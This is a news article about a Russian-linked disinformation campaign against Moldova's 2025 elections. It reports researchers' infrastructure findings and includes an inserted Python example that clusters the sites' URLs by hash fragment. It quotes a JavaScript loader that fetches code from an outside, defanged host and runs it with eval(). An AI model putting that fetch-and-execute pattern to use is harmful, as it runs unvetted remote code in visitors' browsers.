New Russian Disinformation Campaign Targeting Moldova’s Upcoming Elections

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

On the eve of Moldova’s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova’s pro-European leadership.

The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.

These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova’s democratic process.

Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.

Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.

Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation operation known as Absatz.

By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.

Through deep technical analysis, Silent Push analysts noted that the new sites reused several bespoke functions originally developed for the 2022 effort.

These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.

Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.

The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:

<?php
function renderStory($storyId) {
    $seed = 'Storm1679';
    $key = substr(md5($storyId . $seed), 0, 8);
    $templatePath = "/var/www/html/templates/{$key}_template.php";
    include($templatePath);
}
?>

By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.
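The fragment comparison described above can be sketched as follows. This is an added example, not code from Silent Push or the original article: it recomputes the eight-character key from the snippet's seed and groups hosts whose URLs carry a matching fragment. The `id` and `k` query-parameter names and the `.example` hosts are assumptions, since the article does not give the URL layout.

```python
import hashlib
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

SEED = "Storm1679"  # seed string from the renderStory() snippet above


def template_key(story_id: str, seed: str = SEED) -> str:
    """Python equivalent of PHP substr(md5($storyId . $seed), 0, 8)."""
    return hashlib.md5((story_id + seed).encode("utf-8")).hexdigest()[:8]


def classify(url: str, id_param: str = "id", key_param: str = "k"):
    """Return (host, fragment_matches_seed), or None if the URL lacks
    the (assumed) story-id and fragment parameters."""
    parsed = urlparse(url)
    query = parse_qs(parsed.query)
    if id_param not in query or key_param not in query:
        return None
    observed = query[key_param][0].lower()  # PHP md5() emits lowercase hex
    return parsed.hostname, observed == template_key(query[id_param][0])


def cluster(urls):
    """Map each host to the URLs whose fragment was derived from SEED."""
    hits = defaultdict(list)
    for url in urls:
        result = classify(url)
        if result and result[1]:
            hits[result[0]].append(url)
    return dict(hits)


# Constructed sample input (hypothetical hosts, not indicators from the report).
SAMPLE_URLS = [
    f"https://news-a.example/story?id=101&k={template_key('101')}",
    f"https://news-c.example/story?id=7&k={template_key('7').upper()}",
    "https://news-b.example/story?id=101&k=notahash",  # fragment not from SEED
    "https://news-b.example/about",                    # no parameters at all
]

if __name__ == "__main__":
    for host, urls in cluster(SAMPLE_URLS).items():
        print(host, len(urls))
```

Hosts that never appear in the result either use a different seed or do not run this templating module, so a match is evidence of shared code rather than proof of shared operators.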

Detection Evasion and Infrastructure Persistence

The campaign’s operators demonstrated advanced persistence tactics, carefully architecting their infrastructure to evade conventional detection.

Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.

DNS records were configured with extremely short TTL values—often under five minutes—forcing security teams to constantly refresh caches and complicating takedown efforts.

In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:

<script>
  fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
    .then(res => res.text())
    .then(code => eval(code));
</script>

This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user’s browser without touching the original domain.

By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.

To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.

The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.

Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.

As Moldova approaches the polls, this campaign underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.

Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense measures.
